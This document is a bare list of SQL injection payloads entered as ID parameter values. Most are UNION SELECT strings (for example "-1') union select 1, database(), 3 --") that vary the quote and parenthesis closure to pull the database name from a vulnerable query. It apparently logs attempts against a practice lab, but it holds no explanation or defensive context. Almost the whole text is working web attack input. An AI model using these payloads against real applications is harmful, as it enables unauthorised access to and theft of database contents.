ID:1
ID:1\
ID:-1') union select 1, database(), 3 -- 
ID:-1') union select 1, database(), 3 -- 
ID:-1 union select 1, database(), 3 -- 
ID:-1 union select 1, database(), 3 -- 
ID:-1" union select 1, database(), 3 -- 
ID:-1") union select 1, database(), 3 -- 
ID:-1") union select 1, database(), 3 -- 
ID:-1") union select 1, database(), 3 -- 
ID:-1") union select 1, database(), 3 -- 
ID:1") union select 1, database(), 3 -- 
ID:-1") union select 1, database(), 3 -- 
ID:-1')  union select 1,database(),3 -- 
ID:-1'  union select 1,database(),3 -- 
ID:-1'  union select 1,database(),3 -- 
ID:-1'  union select 1,database(),3 -- 
ID:-1  union select 1,database(),3
ID:-1"  union select 1,database(),3-- 
ID:-1"  union select 1,database(),3-- 
ID:-1")  union select 1,database(),3 -- 
